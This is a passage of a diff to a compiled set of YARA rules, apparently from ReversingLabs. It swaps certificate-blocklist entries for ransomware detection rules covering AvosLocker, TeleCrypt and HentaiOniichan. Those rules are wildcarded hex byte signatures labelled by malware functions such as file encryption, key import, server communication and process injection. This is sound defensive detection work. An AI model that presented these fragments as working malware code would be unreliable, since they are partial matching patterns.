"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ebd983bcfa1e5d54af9d9e07d80d05f4752040eab92e63cd986db789fa07026f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.AvosLocker.yara#L1-L108" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4d81b801a95a54a35989c4a985d92578971568d1412f625bca911d0fa1eee1fe" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "AvosLocker" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF + B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 + 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 + ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 + C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? + ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? + FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 + } + $enum_resources = { + 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 57 + E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 33 DB 39 5D ?? 76 ?? 8D 77 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7E + ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 + ?? ?? ?? ?? 39 46 ?? B9 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 8B D1 0F 45 56 ?? 8B C1 83 + 7E ?? ?? 0F 11 85 ?? ?? ?? ?? 0F 45 46 ?? 83 3E ?? 0F 28 05 ?? ?? ?? ?? 89 45 ?? 8B + C1 0F 45 06 83 7E ?? ?? 0F 11 45 ?? 89 45 ?? 8B C1 0F 28 05 ?? ?? ?? ?? 0F 45 46 ?? + 33 C9 0F 11 45 ?? 89 45 ?? 0F 28 05 ?? ?? ?? ?? 0F 11 45 ?? 8A 85 ?? ?? ?? ?? 30 84 + 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 52 FF 75 ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? FF 75 ?? + FF 75 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3E ?? 0F 84 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ?? + 59 83 F8 ?? 0F 86 ?? ?? ?? ?? 8B 06 80 78 ?? ?? 75 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 33 C0 66 C7 45 ?? ?? ?? C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? + 8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 FF 36 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 65 ?? ?? 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? + C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 83 4D ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? EB ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? + C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8 + ?? ?? ?? ?? 59 F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5D + ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15 + } + $import_key = { + 50 53 53 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 50 68 ?? ?? + ?? ?? FF D6 50 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B1 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 30 8C 05 ?? ?? + ?? ?? 40 83 F8 ?? 73 ?? 8A 8D ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? + 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 59 0F 11 85 ?? ?? ?? ?? + 59 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 88 9D + ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 88 9D ?? ?? ?? + ?? FF D6 50 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 36 8D 45 ?? 89 9D ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? FF 76 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? + ?? ?? ?? 83 C4 ?? 8B D7 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 84 C0 75 ?? 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7 + 85 ?? ?? ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83 + F9 ?? 72 ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 50 E8 + ?? ?? ?? ?? 59 8D 4D ?? 85 C0 74 ?? 88 19 41 83 E8 ?? 75 ?? 39 9D ?? ?? ?? ?? 74 ?? + FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 + } + $encrypt_files = { + 50 51 51 FF B5 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? + ?? ?? 8B BD ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 0F 84 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CE 85 C0 74 ?? C6 01 ?? 41 83 E8 ?? 75 ?? 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 59 83 C0 ?? 74 ?? 39 85 ?? ?? ?? ?? 72 ?? 50 8D 85 ?? ?? ?? + ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 + C4 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 59 57 40 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 6A ?? FF B5 ?? ?? ?? ?? 6A + ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? D1 EF 6A ?? 5A 74 ?? + 8B 9D ?? ?? ?? ?? 4B 03 DE 8A 03 8A 0C 32 88 04 32 42 88 0B 4B 3B D7 72 ?? 8B 9D ?? + ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 03 C3 56 50 E8 ?? ?? ?? ?? 03 DF 56 + 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? + ?? 47 81 C6 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 + B9 ?? ?? ?? ?? F7 F1 83 C4 ?? 40 3B F8 0F 82 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LAST TIME PTY LTD" and pe.signatures[i].serial=="de:13:fe:2d:bb:8f:89:02:87:e1:78:0a:ff:6f:fd:22" and 1566259200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_resources) and ($find_files) and ($import_key) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Da000D18949C247D4Ddfc2585Cc8Bd0F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Telecrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects TeleCrypt ransomware." author = "ReversingLabs" - id = "3e939b73-abe4-5941-93ab-18bcde854aaf" - date = "2023-11-08" - modified = "2023-11-08" + id = "c4eada2d-72c0-5efe-bf2b-8f053348d89d" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3506-L3524" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3453f13e633a2c233f78d0389c655bb5304e567407b3e0c5c47e5e7127c345ca" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.TeleCrypt.yara#L1-L109" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9d856eae4369cd7ba1d88bd6ef37931e069127e2c05a84a44f5274f681e83fc0" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "TeleCrypt" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_file = { + 57 E8 ?? ?? ?? ?? 89 03 EB ?? 6A ?? E8 ?? ?? ?? ?? 89 03 66 83 BB ?? ?? ?? ?? ?? 0F + 85 ?? ?? ?? ?? 8B 03 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 81 7B ?? ?? ?? 75 ?? E8 ?? + ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 43 ?? ?? ?? + ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 6A ?? 6A ?? 50 8D 43 ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 + ?? 66 C7 43 ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 89 03 66 81 7B ?? ?? ?? 0F + 85 ?? ?? ?? ?? 66 C7 43 ?? ?? ?? 6A ?? 8B 03 50 E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? + 8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 85 FF 7D ?? 33 FF 6A ?? + 6A ?? 57 8B 03 50 E8 ?? ?? ?? ?? 40 74 ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 83 + ?? ?? ?? ?? 50 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ?? + ?? ?? ?? F6 43 ?? ?? 74 ?? 83 3C 24 ?? 76 ?? 8B 14 24 4A 85 D2 72 ?? 42 33 FF 8D 83 + ?? ?? ?? ?? 80 38 ?? 75 ?? 6A ?? 6A ?? 8B C7 2B 44 24 ?? 50 8B 03 50 E8 ?? ?? ?? ?? + 40 74 ?? 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 EB ?? 47 40 + 4A 75 ?? 66 83 BB ?? ?? ?? ?? ?? 75 ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? 66 + 81 7B ?? ?? ?? 74 ?? 8B 03 50 E8 + } + $server_communication = { + 6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A + ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? + ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? + 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? + 33 C9 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ?? + ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 33 DB 8B CB B8 ?? ?? ?? + ?? D3 E0 85 F0 74 ?? 8D 45 ?? 8B D3 66 83 C2 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 43 83 FB ?? 75 ?? A1 ?? ?? + ?? ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B + 38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 4E 75 ?? A1 ?? ?? ?? ?? 8B 10 + FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 6A ?? 6A ?? 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B + 38 FF 57 ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 43 4E 75 ?? 8D 55 ?? B8 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? + ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 + ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 + } + $server_communication_1 = { + 55 8B EC 33 C9 51 51 51 51 51 53 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A + ?? 8D 45 ?? 50 33 C9 BA ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? + 50 8D 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? + ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 33 C9 8B 83 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 33 D2 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $exec_payload = { + 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? + E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? + ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? + 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? C3 + } + $copy_payload = { + 55 8B EC 6A ?? 6A ?? 6A ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ?? + ?? ?? ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? B8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 + 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 + 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $generate_strings_to_encrypt = { + 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D + 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? + ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? + ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? + ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 + ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 + 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? + ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? + ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B + 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? + 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 + ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 + ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? + ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? + 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PORT-SERVIS LTD" and (pe.signatures[i].serial=="00:da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" or pe.signatures[i].serial=="da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f") and 1564444800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($generate_strings_to_encrypt and $encrypt_file and $server_communication and $exec_payload) or ($encrypt_file and $server_communication_1 and $copy_payload)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_06E842D3Ea6249D783D6B55E29C060C7 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Hentaioniichan : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Hentai Oniichan ransomware." author = "ReversingLabs" - id = "37829f07-c569-5e46-8b7a-2137c4c801e8" - date = "2023-11-08" - modified = "2023-11-08" + id = "cd5e916f-7195-5bb6-abff-b08231053f9a" + date = "2021-03-05" + modified = "2021-03-05" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3526-L3542" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9f71de0119527c8580f9e47e3fba07242814c5a537d727d4541fd7a802b0cb86" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.HentaiOniichan.yara#L1-L140" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "153526e5a2f05bc8e3f77d83eefce6b4cd962ea093b6f1c0ab8fcabe8d8a7ad9" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "HentaiOniichan" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 + 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? + 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? + ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? + ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B + CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? + 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 + } + $find_files_p2 = { + 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 + ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? + ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? + 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? + ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? + ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? + 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? + ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? + 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $inject_code_into_process = { + 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 + ?? ?? ?? 